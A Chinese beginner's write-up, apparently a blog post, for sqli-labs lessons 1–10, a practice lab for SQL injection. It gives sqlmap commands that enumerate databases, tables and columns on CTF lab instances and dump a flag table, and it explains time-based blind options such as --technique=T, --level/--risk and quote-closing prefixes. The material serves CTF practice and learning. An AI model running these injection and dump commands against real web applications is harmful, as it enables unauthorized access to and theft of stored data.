当前位置: 首页 > news >正文

sqli-labs 1(Less-1-Less-10)新手解题思路 - 指南

sqli-labs 1

Less-1/ Less-2/ Less-3/ Less-4 Less-5/Less-6/Less-7Less-8/ Less-9

1、打开页面,尝试输入?id=1,?id=2…,都会有回显,所以确定这类题为sql注入,接下来我们依然来进行四部曲(暴库,暴表,暴字段,暴密码)

  1. 暴库

sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' –dbs

3、暴表

sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' -D ctftraining –tables

4、暴字段

sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' -D ctftraining -T flag -columns

  1. 暴flag

sqlmap -u 'http://1dfcaf0d-2122-455e-907b-7e7aaafa23e9.node5.buuoj.cn/Less-1/?id=1' -random-agent -D ctftraining -T flag flag -dump

Less-10

1、明确指定注入类型(时间盲注)

Less-10 通常需要时间盲注,可强制 sqlmap 测试该类型:

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --technique=T

--technique=T:指定仅测试时间盲注(Time-based blind),跳过其他类型,提高针对性。

2、提高测试级别和风险(推荐)

默认--level=1和--risk=1测试强度较低,可提高至:

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --level=3 --risk=2

--level=3:增加测试 payload 的数量,包括更多特殊字符和边界测试(Level 3 及以上会测试 Cookie、User-Agent 等,但这里主要针对id参数)。

--risk=2:允许使用可能影响数据完整性的 payload(如OR、UNION等,适合盲注场景)。

3. 手动指定参数闭合方式(关键)

Less-10 的id通常被单引号包裹,可手动告诉 sqlmap 闭合方式,避免其猜测错误:

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --technique=T -p id --prefix "'" --suffix "--+"

-p id:明确指定测试id参数。

--prefix "'":指定参数前的闭合符为单引号(即id='1'中的单引号)。

--suffix "--+":指定参数后的注释符(--+用于注释掉后面的 SQL 语句,避免语法错误)。

4、延长时间盲注检测等待时间

若目标响应较慢,可增加延迟判断时间(默认 5 秒)

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --technique=T --time-sec=10

--time-sec=10:设置时间盲注的延迟阈值为 10 秒(即注入语句若使服务器延迟 10 秒以上,则判定为有效)。

5、本题选择提高测试级别和风险(推荐)暴库

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent --dbs --level=3 --risk=2

6、暴表

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent -D ctftraining --tables --level=3 --risk=2

  1. 暴字段

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent -D ctftraining -T flag --columns --level=3 --risk=2

  1. 暴内容

sqlmap -u "http://f013c70f-54a4-44c8-8267-d1fefa9c0acc.node5.buuoj.cn/Less-10/?id=1" --random-agent -D ctftraining -T flag flag --dump --level=3 --risk=2

http://www.gsyq.cn/news/56644.html

相关文章:

  • PyMAF 2023 单张照片估计参数化人体
  • 轻松速通:TTS播放、文件播放与录音的核心功能解析!
  • 修改DTS适配遥控用户码
  • nginx性能优化之tcp调优
  • UModel 数据治理:运维世界模型构建实践
  • 2025年11月21日
  • James Watsons
  • 计算机网络:物理层 - 实践
  • MongoDB 平替新方案:金仓多模数据库驱动电子证照国产化落地 - 详解
  • Windows Server 2019 中文版、英文版下载 (2025 年 11 月更新)
  • 2025年11月中国/江苏/徐州MPP电力管,PE管,喷灌机管,建筑排水管,虹吸管综合评测与权威推荐榜单
  • Windows 11 25H2 | 24H2 中文版、英文版 (x64、ARM64) 下载 (2025 年 11 月更新)
  • 2025年11月中国/江苏/徐州MPP电力管,PE管,喷灌机管,建筑排水管,虹吸管权威推荐榜:评测与选购指南
  • 留学中介文书结构榜!申请院校哪家机构逻辑最清晰?
  • 2025年包头家政服务标杆企业最新推荐:信达家政,保洁|保姆|开荒|月嫂|护工一体化服务新标准
  • 2025 年国内空气站智慧站房厂家市场排名与品牌影响力分析报告
  • 留学中介这份文书终极排行快看!哪家最值得信任?
  • 留学中介文书实力排行来了!业内谁是写作天花板?
  • 2025年11月新疆学历提升/成人学历/专升本/自考本科/高起专权威推荐榜:中研教育登顶
  • 2025 年 11 月羊绒衫厂家推荐排行榜,女式羊绒衫,男士羊绒衫,小香风羊绒衫,精选优质羊绒衫公司推荐
  • 年末冲刺 | 2025年12月国际会议日历 | 覆盖理工文管全领域,快速投稿通道
  • 品牌评比结果公布,留学中介排行榜TOP10值得选择
  • 留学中介排名TOP10服务体验评选,这家学生最满意
  • 降ai率免费工具推荐:提升文本原创性的实用选择
  • 石油石化电力电缆生产厂家推荐权威TOP名单(2025年11月):涵盖低压、中压、聚乙烯绝缘电缆生产厂家盘点
  • 2025年路灯品牌权威推荐榜单:太阳能路灯/市电路灯/高杆灯供应商精选
  • 2025 年 11 月轨道交通电力电缆生产厂家精选:中低压电缆(含中压 / 低压)、变频电缆、聚乙烯绝缘电缆、聚氯乙烯绝缘电缆优质企业 Top10 推荐
  • llama-factory llm模型微调框架
  • #C语言——学习攻略:攻克 文档操作内容(一),根本不在话下!
  • 新能源行业时序数据库选型指南:五大关键维度与评估标准